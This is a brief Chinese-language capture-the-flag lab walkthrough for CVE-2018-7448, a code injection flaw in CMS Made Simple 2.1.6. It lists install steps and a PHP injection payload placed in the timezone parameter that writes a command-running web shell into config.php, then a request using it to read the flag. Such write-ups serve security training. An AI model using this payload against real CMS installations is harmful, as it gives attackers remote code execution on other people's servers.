春秋云镜 CVE-2018-7448 CMS Made Simple 2.1.6 RCE

靶标介绍

CMS Made Simple 2.1.6版本存在代码注入漏洞，可以通过 timezone 参数执行任意代码。

启动场景

漏洞利用

1、目的文件夹选择/var/www/html/cms

2、next到第四步，数据库名：cms，root/root

3、next，burp抓包，timezone的参数UTC改成

junk';echo%20system($_GET['cmd']);$junk='

4、next直至结束

5、http://eci-2zehyvvul4o6vfdpo5s7.cloudeci1.ichunqiu.com/cms/config.php?cmd=cat%20/flag

得到flag

flag{8ec4f4f2-37ff-497c-86b6-d207df6d6147}